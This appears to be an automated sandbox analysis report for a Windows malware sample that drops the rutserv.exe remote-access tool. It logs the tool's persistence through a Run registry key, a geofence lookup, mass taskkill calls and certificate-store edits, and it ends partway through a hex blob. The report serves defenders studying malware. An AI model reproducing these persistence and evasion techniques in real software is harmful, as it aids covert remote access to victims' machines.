Analysis
-
max time kernel
146s -
max time network
151s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
01-11-2020 10:30
Static task
static1
Behavioral task
behavioral1
Sample
ee0400adcec67d05e4b6825df53ff7e5fb5d86680a65264976940239c322d9fb.exe
Resource
win7v20201028
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
ee0400adcec67d05e4b6825df53ff7e5fb5d86680a65264976940239c322d9fb.exe
Resource
win10v20201028
windows10_x64
0 signatures
0 seconds
General
-
Target
ee0400adcec67d05e4b6825df53ff7e5fb5d86680a65264976940239c322d9fb.exe
-
Size
4.9MB
-
MD5
8817ae0956677b821ae053b7fff41968
-
SHA1
a0e0577c501355b80f7d1240cf9b850598bc0730
-
SHA256
ee0400adcec67d05e4b6825df53ff7e5fb5d86680a65264976940239c322d9fb
-
SHA512
0d0e7d149d7bf6217b9e169fbcb8a85460f8d20f1868b2ae6f686e2211f6cf6c2fa89831d72d8a34c4135252d5b99d48203cac58490c38411c98e9f0447c9883
Score
10/10
Malware Config
Signatures
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 2840 created 1020 2840 svchost.exe 86 -
Executes dropped EXE 3 IoCs
pid Process 1780 ee0400adcec67d05e4b6825df53ff7e5fb5d86680a65264976940239c322d9fb.tmp 1020 rutserv.exe 2032 rutserv.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Control Panel\International\Geo\Nation rutserv.exe -
Loads dropped DLL 4 IoCs
pid Process 1020 rutserv.exe 1020 rutserv.exe 2032 rutserv.exe 2032 rutserv.exe -
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run\nots = "C:\\ProgramData\\Immunity\\rutserv.exe" reg.exe -
JavaScript code in executable 3 IoCs
resource yara_rule behavioral2/files/0x000100000001ab7f-14.dat js behavioral2/files/0x000100000001ab7f-15.dat js behavioral2/files/0x000100000001ab7f-51.dat js -
Drops file in System32 directory 12 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache rutserv.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData rutserv.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\378B079587A9184B2E2AB859CB263F40_524AD1B9B08D3C6450727265AE77B7D2 rutserv.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\378B079587A9184B2E2AB859CB263F40_524AD1B9B08D3C6450727265AE77B7D2 rutserv.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8EB35376744F392396307460D546222D_EC1C46868A78521D3A7ED5209EF9CB19 rutserv.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft rutserv.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 rutserv.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content rutserv.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 rutserv.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8EB35376744F392396307460D546222D_EC1C46868A78521D3A7ED5209EF9CB19 rutserv.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C86BD7751D53F10F65AAAD66BBDF33C7 rutserv.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C86BD7751D53F10F65AAAD66BBDF33C7 rutserv.exe -
Delays execution with timeout.exe 2 IoCs
pid Process 1812 timeout.exe 4672 timeout.exe -
Kills process with taskkill 100 IoCs
pid Process 3052 taskkill.exe 4560 taskkill.exe 1716 taskkill.exe 2644 taskkill.exe 3988 taskkill.exe 3968 taskkill.exe 4136 taskkill.exe 4368 taskkill.exe 4492 taskkill.exe 4940 taskkill.exe 2604 taskkill.exe 4308 taskkill.exe 4600 taskkill.exe 2184 taskkill.exe 3952 taskkill.exe 512 taskkill.exe 2676 taskkill.exe 2196 taskkill.exe 2052 taskkill.exe 4024 taskkill.exe 1112 taskkill.exe 2360 taskkill.exe 3956 taskkill.exe 4088 taskkill.exe 3752 taskkill.exe 2596 taskkill.exe 2264 taskkill.exe 2180 taskkill.exe 3276 taskkill.exe 1252 taskkill.exe 2924 taskkill.exe 5068 taskkill.exe 3884 taskkill.exe 4176 taskkill.exe 3524 taskkill.exe 3924 taskkill.exe 3720 taskkill.exe 4272 taskkill.exe 4304 taskkill.exe 4604 taskkill.exe 4668 taskkill.exe 4060 taskkill.exe 4232 taskkill.exe 4116 taskkill.exe 4016 taskkill.exe 1880 taskkill.exe 3784 taskkill.exe 1672 taskkill.exe 3396 taskkill.exe 2740 taskkill.exe 4168 taskkill.exe 2576 taskkill.exe 4972 taskkill.exe 4748 taskkill.exe 3548 taskkill.exe 3376 taskkill.exe 2772 taskkill.exe 3192 taskkill.exe 1220 taskkill.exe 4844 taskkill.exe 4356 taskkill.exe 3892 taskkill.exe 4236 taskkill.exe 4636 taskkill.exe 4264 taskkill.exe 4200 taskkill.exe 4704 taskkill.exe 5104 taskkill.exe 4288 taskkill.exe 2228 taskkill.exe 1164 taskkill.exe 3848 taskkill.exe 3316 taskkill.exe 1460 taskkill.exe 3256 taskkill.exe 4336 taskkill.exe 5004 taskkill.exe 2112 taskkill.exe 4104 taskkill.exe 4408 taskkill.exe 4568 taskkill.exe 4788 taskkill.exe 5036 taskkill.exe 4372 taskkill.exe 1564 taskkill.exe 2760 taskkill.exe 4908 taskkill.exe 3820 taskkill.exe 2296 taskkill.exe 2140 taskkill.exe 4452 taskkill.exe 4652 taskkill.exe 1516 taskkill.exe 4444 taskkill.exe 4876 taskkill.exe 4628 taskkill.exe 1592 taskkill.exe 2224 taskkill.exe 1532 taskkill.exe 2776 taskkill.exe -
Modifies data under HKEY_USERS 45 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot rutserv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs rutserv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs rutserv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates rutserv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates rutserv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs rutserv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates rutserv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs rutserv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs rutserv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs rutserv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates rutserv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates rutserv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs rutserv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs rutserv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust rutserv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates rutserv.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCache rutserv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing rutserv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs rutserv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople rutserv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs rutserv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople rutserv.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@C:\Windows\SysWOW64\FirewallControlPanel.dll,-12122 = "Windows Firewall" rutserv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed rutserv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs rutserv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates rutserv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs rutserv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust rutserv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs rutserv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates rutserv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs rutserv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root rutserv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates rutserv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates rutserv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA rutserv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs rutserv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs rutserv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs rutserv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My rutserv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs rutserv.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 rutserv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA rutserv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs rutserv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed rutserv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs rutserv.exe -
description ioc Process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\91C6D6EE3E8AC86384E548C299295C756C817B81\Blob = 0400000001000000100000008ccadc0b22cef5be72ac411a11a8d81203000000010000001400000091c6d6ee3e8ac86384e548c299295c756c817b817e00000001000000080000000040d0d1b0ffd4017f000000010000000c000000300a06082b060105050703010b000000010000000e00000074006800610077007400650000001d00000001000000100000005b3b67000eeb80022e42605b6b3b72401400000001000000140000007b5b45cfafcecb7afd31921a6ab6f346eb5748506200000001000000200000008d722f81a9c113c0791df136a2966db26c950a971db46b4199f4ea54b78bfb9f53000000010000002500000030233021060b6086480186f8450107300130123010060a2b0601040182373c0101030200c009000000010000002a000000302806082b0601050507030206082b0601050507030306082b0601050507030406082b060105050703010f000000010000001400000085fef11b4f47fe3952f98301c9f98976fefee0ce2000000001000000240400003082042030820308a0030201020210344ed55720d5edec49f42fce37db2b6d300d06092a864886f70d01010505003081a9310b300906035504061302555331153013060355040a130c7468617774652c20496e632e31283026060355040b131f43657274696669636174696f6e205365727669636573204469766973696f6e31383036060355040b132f2863292032303036207468617774652c20496e632e202d20466f7220617574686f72697a656420757365206f6e6c79311f301d06035504031316746861777465205072696d61727920526f6f74204341301e170d3036313131373030303030305a170d3336303731363233353935395a3081a9310b300906035504061302555331153013060355040a130c7468617774652c20496e632e31283026060355040b131f43657274696669636174696f6e205365727669636573204469766973696f6e31383036060355040b132f2863292032303036207468617774652c20496e632e202d20466f7220617574686f72697a656420757365206f6e6c79311f301d06035504031316746861777465205072696d61727920526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100aca0f0fb8059d49cc7a4cf9da159730910450c0d2c6e68f16c5b4868495937fc0b3319c2777fcc102d95341ce6eb4d09a71cd2b8c9973602b789d4245f06c0cc4494948d02626feb5add118d289a5c8490107a0dbd74662f6a38a0e2d55444eb1d079f07ba6feee9fd4e0b29f53e84a001f19cabf81c7e89a4e8a1d871650da3517beebcd222600db95b9ddfbafc515b0baf98b2e92ee904e86287de2bc8d74ec14c641eddcf8758ba4a4fca68071d1c9d4ac6d52f91cc7c71721cc5c067eb32fdc9925c94da85c09bbf537d2b09f48c9d911f976a52cbde0936a477d87b875044d53e6e2969fb3949261e09a5807b402debe82785c9fe61fd7ee67c971dd59d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e041604147b5b45cfafcecb7afd31921a6ab6f346eb574850300d06092a864886f70d010105050003820101007911c04bb391b6fcf0e967d40d6e45be55e893d2ce033fedda25b01d57cb1e3a76a04cec5076e864720ca4a9f1b88bd6d68784bb32e54111c077d9b3609deb1bd5d16e4444a9a601ec55621d77b85c8e48497c9c3b5711acad73378e2f785c906847d96060e6fc073d222017c4f716e9c4d872f9c8737cdf162f15a93efd6a27b6a1eb5aba981fd5e34d640a9d13c861baf5391c87bab8bd7b227ff6feac4079e5ac106f3d8f1b79768bc437b3211884e53600eb632099b9e9fe3304bb41c8c102f94463209e81ce42d3d63f2c76d3639c59dd8fa6e10ea02e41f72e9547cfbcfd33f3f60b617e7e912b8147c22730eea7105d378f5c392be404f07b8d568c68 rutserv.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\91C6D6EE3E8AC86384E548C299295C756C817B81\Blob = 190000000100000010000000dc73f9b71e16d51d26527d32b11a6a3d0f000000010000001400000085fef11b4f47fe3952f98301c9f98976fefee0ce09000000010000002a000000302806082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030153000000010000002500000030233021060b6086480186f8450107300130123010060a2b0601040182373c0101030200c06200000001000000200000008d722f81a9c113c0791df136a2966db26c950a971db46b4199f4ea54b78bfb9f1400000001000000140000007b5b45cfafcecb7afd31921a6ab6f346eb5748501d00000001000000100000005b3b67000eeb80022e42605b6b3b72400b000000010000000e00000074006800610077007400650000007f000000010000000c000000300a06082b060105050703017e00000001000000080000000040d0d1b0ffd40103000000010000001400000091c6d6ee3e8ac86384e548c299295c756c817b810400000001000000100000008ccadc0b22cef5be72ac411a11a8d8122000000001000000240400003082042030820308a0030201020210344ed55720d5edec49f42fce37db2b6d300d06092a864886f70d01010505003081a9310b300906035504061302555331153013060355040a130c7468617774652c20496e632e31283026060355040b131f43657274696669636174696f6e205365727669636573204469766973696f6e31383036060355040b132f2863292032303036207468617774652c20496e632e202d20466f7220617574686f72697a656420757365206f6e6c79311f301d06035504031316746861777465205072696d61727920526f6f74204341301e170d3036313131373030303030305a170d3336303731363233353935395a3081a9310b300906035504061302555331153013060355040a130c7468617774652c20496e632e31283026060355040b131f43657274696669636174696f6e205365727669636573204469766973696f6e31383036060355040b132f2863292032303036207468617774652c20496e632e202d20466f7220617574686f72697a656420757365206f6e6c79311f301d06035504031316746861777465205072696d61727920526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100aca0f0fb8059d49cc7a4cf9da159730910450c0d2c6e68f16c5b4868495937fc0b3319c2777fcc102d95341ce6eb4d09a71cd2b8c9973602b789d4245f06c0cc4494948d02626feb5add118d289a5c8490107a0dbd74662f6a38a0e2d55444eb1d079f07ba6feee9fd4e0b29f53e84a001f19cabf81c7e89a4e8a1d871650da3517beebcd222600db95b9ddfbafc515b0baf98b2e92ee904e86287de2bc8d74ec14c641eddcf8758ba4a4fca68071d1c9d4ac6d52f91cc7c71721cc5c067eb32fdc9925c94da85c09bbf537d2b09f48c9d911f976a52cbde0936a477d87b875044d53e6e2969fb3949261e09a5807b402debe82785c9fe61fd7ee67c971dd59d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e041604147b5b45cfafcecb7afd31921a6ab6f346eb574850300d06092a864886f70d010105050003820101007911c04bb391b6fcf0e967d40d6e45be55e893d2ce033fedda25b01d57cb1e3a76a04cec5076e864720ca4a9f1b88bd6d68784bb32e54111c077d9b3609deb1bd5d16e4444a9a601ec55621d77b85c8e48497c9c3b5711acad73378e2f785c906847d96060e6fc073d222017c4f716e9c4d872f9c8737cdf162f15a93efd6a27b6a1eb5aba981fd5e34d640a9d13c861baf5391c87bab8bd7b227ff6feac4079e5ac106f3d8f1b79768bc437b3211884e53600eb632099b9e9fe3304bb41c8c102f94463209e81ce42d3d63f2c76d3639c59dd8fa6e10ea02e41f72e9547cfbcfd33f3f60b617e7e912b8147c22730eea7105d378f5c392be404f07b8d568c68 rutserv.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 5c000000010000000400000000080000190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa604000000010000001000000087ce0b7b2a0e4900e158719b37a893722000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 rutserv.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\91C6D6EE3E8AC86384E548C299295C756C817B81 rutserv.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\91C6D6EE3E8AC86384E548C299295C756C817B81\Blob = 0f000000010000001400000085fef11b4f47fe3952f98301c9f98976fefee0ce09000000010000002a000000302806082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030153000000010000002500000030233021060b6086480186f8450107300130123010060a2b0601040182373c0101030200c06200000001000000200000008d722f81a9c113c0791df136a2966db26c950a971db46b4199f4ea54b78bfb9f1400000001000000140000007b5b45cfafcecb7afd31921a6ab6f346eb5748501d00000001000000100000005b3b67000eeb80022e42605b6b3b72400b000000010000000e00000074006800610077007400650000007f000000010000000c000000300a06082b060105050703017e00000001000000080000000040d0d1b0ffd40103000000010000001400000091c6d6ee3e8ac86384e548c299295c756c817b812000000001000000240400003082042030820308a0030201020210344ed55720d5edec49f42fce37db2b6d300d06092a864886f70d01010505003081a9310b300906035504061302555331153013060355040a130c7468617774652c20496e632e31283026060355040b131f43657274696669636174696f6e205365727669636573204469766973696f6e31383036060355040b132f2863292032303036207468617774652c20496e632e202d20466f7220617574686f72697a656420757365206f6e6c79311f301d06035504031316746861777465205072696d61727920526f6f74204341301e170d3036313131373030303030305a170d3336303731363233353935395a3081a9310b300906035504061302555331153013060355040a130c7468617774652c20496e632e31283026060355040b131f43657274696669636174696f6e205365727669636573204469766973696f6e31383036060355040b132f2863292032303036207468617774652c20496e632e202d20466f7220617574686f72697a656420757365206f6e6c79311f301d06035504031316746861777465205072696d61727920526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100aca0f0fb8059d49cc7a4cf9da159730910450c0d2c6e68f16c5b4868495937fc0b3319c2777fcc102d95341ce6eb4d09a71cd2b8c9973602b789d4245f06c0cc4494948d02626feb5add118d289a5c8490107a0dbd74662f6a38a0e2d55444eb1d079f07ba6feee9fd4e0b29f53e84a001f19cabf81c7e89a4e8a1d871650da3517beebcd222600db95b9ddfbafc515b0baf98b2e92ee904e86287de2bc8d74ec14c641eddcf8758ba4a4fca68071d1c9d4ac6d52f91cc7c71721cc5c067eb32fdc9925c94da85c09bbf537d2b09f48c9d911f976a52cbde0936a477d87b875044d53e6e2969fb3949261e09a5807b402debe82785c9fe61fd7ee67c971dd59d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e041604147b5b45cfafcecb7afd31921a6ab6f346eb574850300d06092a864886f70d010105050003820101007911c04bb391b6fcf0e967d40d6e45be55e893d2ce033fedda25b01d57cb1e3a76a04cec5076e864720ca4a9f1b88bd6d68784bb32e54111c077d9b3609deb1bd5d16e4444a9a601ec55621d77b85c8e48497c9c3b5711acad73378e2f785c906847d96060e6fc073d222017c4f716e9c4d872f9c8737cdf162f15a93efd6a27b6a1eb5aba981fd5e34d640a9d13c861baf5391c87bab8bd7b227ff6feac4079e5ac106f3d8f1b79768bc437b3211884e53600eb632099b9e9fe3304bb41c8c102f94463209e81ce42d3d63f2c76d3639c59dd8fa6e10ea02e41f72e9547cfbcfd33f3f60b617e7e912b8147c22730eea7105d378f5c392be404f07b8d568c68 rutserv.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\91C6D6EE3E8AC86384E548C299295C756C817B81\Blob = 5c0000000100000004000000000800000400000001000000100000008ccadc0b22cef5be72ac411a11a8d81203000000010000001400000091c6d6ee3e8ac86384e548c299295c756c817b817e00000001000000080000000040d0d1b0ffd4017f000000010000000c000000300a06082b060105050703010b000000010000000e00000074006800610077007400650000001d00000001000000100000005b3b67000eeb80022e42605b6b3b72401400000001000000140000007b5b45cfafcecb7afd31921a6ab6f346eb5748506200000001000000200000008d722f81a9c113c0791df136a2966db26c950a971db46b4199f4ea54b78bfb9f53000000010000002500000030233021060b6086480186f8450107300130123010060a2b0601040182373c0101030200c009000000010000002a000000302806082b0601050507030206082b0601050507030306082b0601050507030406082b060105050703010f000000010000001400000085fef11b4f47fe3952f98301c9f98976fefee0ce190000000100000010000000dc73f9b71e16d51d26527d32b11a6a3d2000000001000000240400003082042030820308a0030201020210344ed55720d5edec49f42fce37db2b6d300d06092a864886f70d01010505003081a9310b300906035504061302555331153013060355040a130c7468617774652c20496e632e31283026060355040b131f43657274696669636174696f6e205365727669636573204469766973696f6e31383036060355040b132f2863292032303036207468617774652c20496e632e202d20466f7220617574686f72697a656420757365206f6e6c79311f301d06035504031316746861777465205072696d61727920526f6f74204341301e170d3036313131373030303030305a170d3336303731363233353935395a3081a9310b300906035504061302555331153013060355040a130c7468617774652c20496e632e31283026060355040b131f43657274696669636174696f6e205365727669636573204469766973696f6e31383036060355040b132f2863292032303036207468617774652c20496e632e202d20466f7220617574686f72697a656420757365206f6e6c79311f301d06035504031316746861777465205072696d61727920526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100aca0f0fb8059d49cc7a4cf9da159730910450c0d2c6e68f16c5b4868495937fc0b3319c2777fcc102d95341ce6eb4d09a71cd2b8c9973602b789d4245f06c0cc4494948d02626feb5add118d289a5c8490107a0dbd74662f6a38a0e2d55444eb1d079f07ba6feee9fd4e0b29f53e84a001f19cabf81c7e89a4e8a1d871650da3517beebcd222600db95b9ddfbafc515b0baf98b2e92ee904e86287de2bc8d74ec14c641eddcf8758ba4a4fca68071d1c9d4ac6d52f91cc7c71721cc5c067eb32fdc9925c94da85c09bbf537d2b09f48c9d911f976a52cbde0936a477d87b875044d53e6e2969fb3949261e09a5807b402debe82785c9fe61fd7ee67c971dd59d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e041604147b5b45cfafcecb7afd31921a6ab6f346eb574850300d06092a864886f70d010105050003820101007911c04bb391b6fcf0e967d40d6e45be55e893d2ce033fedda25b01d57cb1e3a76a04cec5076e864720ca4a9f1b88bd6d68784bb32e54111c077d9b3609deb1bd5d16e4444a9a601ec55621d77b85c8e48497c9c3b5711acad73378e2f785c906847d96060e6fc073d222017c4f716e9c4d872f9c8737cdf162f15a93efd6a27b6a1eb5aba981fd5e34d640a9d13c861baf5391c87bab8bd7b227ff6feac4079e5ac106f3d8f1b79768bc437b3211884e53600eb632099b9e9fe3304bb41c8c102f94463209e81ce42d3d63f2c76d3639c59dd8fa6e10ea02e41f72e9547cfbcfd33f3f60b617e7e912b8147c22730eea7105d378f5c392be404f07b8d568c68 rutserv.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43 rutserv.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 0f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d432000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a